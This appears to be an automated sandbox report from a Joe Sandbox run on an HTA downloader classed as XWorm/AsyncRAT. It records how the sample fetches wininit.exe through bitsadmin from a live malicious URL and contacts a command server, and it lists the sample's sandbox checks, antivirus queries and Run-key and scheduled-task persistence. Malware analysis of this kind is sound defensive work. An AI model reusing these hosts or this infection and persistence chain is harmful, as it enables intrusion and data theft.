                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: wininit.exe, 00000005.00000002.3277474084.00000000008D4000.00000004.00000020.00020000.00000000.sdmp, wininit.exe, 00000005.00000002.3290024067.000000001B67C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 5.0.wininit.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.wininit.exe.27df820.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.wininit.exe.27df820.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5688, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wininit.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: 5.0.wininit.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.wininit.exe.27df820.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.wininit.exe.27df820.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5688, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 1292, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wininit.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		OS Credential Dumping1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      BITS Jobs                      		11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory34
                      System Information Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Obfuscated Files or Information                      		Security Account Manager551
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      PowerShell                      		21
                      Registry Run Keys / Startup Folder                      		21
                      Registry Run Keys / Startup Folder                      		2
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets161
                      Virtualization/Sandbox Evasion                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                      Virtualization/Sandbox Evasion                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      BITS Jobs                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568462 Sample: downloader2.hta Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 54 ddk.2k8u3.org 2->54 56 2k8u3.org 2->56 58 ip-api.com 2->58 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 21 other signatures 2->74 9 mshta.exe 1 2->9         started        12 svchost.exe 1 2 2->12         started        16 wininit.exe 2->16         started        18 wininit.exe 2->18         started        signatures3 process4 dnsIp5 84 Tries to download files via bitsadmin 9->84 20 wininit.exe 15 6 9->20         started        25 bitsadmin.exe 1 9->25         started        64 2k8u3.org 104.21.80.1, 49707, 80 CLOUDFLARENETUS United States 12->64 66 127.0.0.1 unknown unknown 12->66 50 C:\Users\user\AppData\...\wininit.exe (copy), PE32 12->50 dropped 52 C:\Users\user\AppData\Local\...\BIT6DEB.tmp, PE32 12->52 dropped 86 Benign windows process drops PE files 12->86 88 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->88 90 Antivirus detection for dropped file 16->90 92 Multi AV Scanner detection for dropped file 16->92 94 Machine Learning detection for dropped file 16->94 file6 signatures7 process8 dnsIp9 60 ddk.2k8u3.org 116.122.95.113, 49906, 49915, 49924 SKB-ASSKBroadbandCoLtdKR Korea Republic of 20->60 62 ip-api.com 208.95.112.1, 49765, 80 TUT-ASUS United States 20->62 48 C:\Users\user\AppData\Roaming\wininit.exe, PE32 20->48 dropped 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->76 78 Protects its processes via BreakOnTermination flag 20->78 80 Bypasses PowerShell execution policy 20->80 82 5 other signatures 20->82 27 powershell.exe 23 20->27         started        30 powershell.exe 23 20->30         started        32 powershell.exe 21 20->32         started        36 2 other processes 20->36 34 conhost.exe 25->34         started        file10 signatures11 process12 signatures13 96 Loading BitLocker PowerShell Module 27->96 38 conhost.exe 27->38         started        40 conhost.exe 30->40         started        42 conhost.exe 32->42         started        44 conhost.exe 36->44         started        46 conhost.exe 36->46         started        process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      downloader2.hta32%ReversingLabsScript-WScript.Trojan.XWorm

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Roaming\wininit.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\wininit.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      C:\Users\user\AppData\Local\Temp\wininit.exe (copy)92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                      C:\Users\user\AppData\Roaming\wininit.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://2k8u3.org/wininit.exeC:0%Avira URL Cloudsafe
                      ddk.2k8u3.org0%Avira URL Cloudsafe
                      http://2k8u3.org/wininit.exe/C:100%Avira URL Cloudmalware
                      http://2k8u3.org/wininit.exe100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ddk.2k8u3.org
                      		116.122.95.113
                      		truetrue
                        		unknown
                        2k8u3.org
                        		104.21.80.1
                        		truetrue
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            ddk.2k8u3.orgtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://g.live.com/odclientsettings/Prod/C:edb.log.3.drfalse
                                		high
                                http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2650109516.0000024B1FEE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2741207270.000001A295FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2882061125.00000262B2F0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://2k8u3.org/wininit.exe/C:edb.log.3.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.2632232562.0000024B10099000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A2861AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A30C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://2k8u3.org/wininit.exebitsadmin.exe, 00000001.00000002.2433341737.0000000002E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3278495341.000001BA68CA6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2480849296.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2111634556.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2458818627.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3279269441.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3280358456.000001BA6E20F000.00000004.00000020.00020000.00000000.sdmp, downloader2.htatrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2632232562.0000024B10099000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A2861AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A30C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2650109516.0000024B1FEE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2741207270.000001A295FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2882061125.00000262B2F0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://2k8u3.org/wininit.exeC:bitsadmin.exe, 00000001.00000002.2433341737.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ip-api.comwininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.ver)svchost.exe, 00000003.00000002.3280717372.000001BA6E28D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000003.00000003.2048029550.000001BA6E0C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                                        		high
                                                        http://www.microsoft.powershell.exe, 0000000E.00000002.3079855605.000001B46E55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.2632232562.0000024B0FE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A285F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A2EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2632232562.0000024B0FE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A285F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A2EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                		ip-api.comUnited States
                                                                		53334TUT-ASUSfalse
                                                                116.122.95.113
                                                                		ddk.2k8u3.orgKorea Republic of
                                                                		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                104.21.80.1
                                                                		2k8u3.orgUnited States
                                                                		13335CLOUDFLARENETUStrue

                                                                Private

                                                                IP
                                                                127.0.0.1

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1568462
                                                                Start date and time:2024-12-04 16:24:56 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 28s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:20
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:downloader2.hta
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winHTA@24/27@3/4
                                                                EGA Information:
                                                                • Successful, ratio: 14.3%
                                                                HCA Information:
                                                                • Successful, ratio: 95%
                                                                • Number of executed functions: 77
                                                                • Number of non-executed functions: 4
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .hta

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target bitsadmin.exe, PID 3628 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 3276 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 3372 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 5584 because it is empty
                                                                • Execution Graph export aborted for target wininit.exe, PID 5428 because it is empty
                                                                • Execution Graph export aborted for target wininit.exe, PID 6180 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: downloader2.hta

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                10:25:49API Interceptor2x Sleep call for process: svchost.exe modified
                                                                10:26:34API Interceptor78x Sleep call for process: powershell.exe modified
                                                                10:27:37API Interceptor11x Sleep call for process: wininit.exe modified
                                                                16:27:38Task SchedulerRun new task: wininit path: C:\Users\user\AppData\Roaming\wininit.exe
                                                                16:27:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wininit C:\Users\user\AppData\Roaming\wininit.exe
                                                                16:27:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wininit C:\Users\user\AppData\Roaming\wininit.exe
                                                                16:27:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnk

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1JjUCGUKdtX.exeGet hashmaliciousUnknownBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                                                • ip-api.com/json/
                                                                T9R663ZHsf.exeGet hashmaliciousDCRatBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                • ip-api.com/json/
                                                                7Zur2FiS0p.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Hlx2hL1z8B.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                KqJ1zWlHp1.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Eemw0Iqp2J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
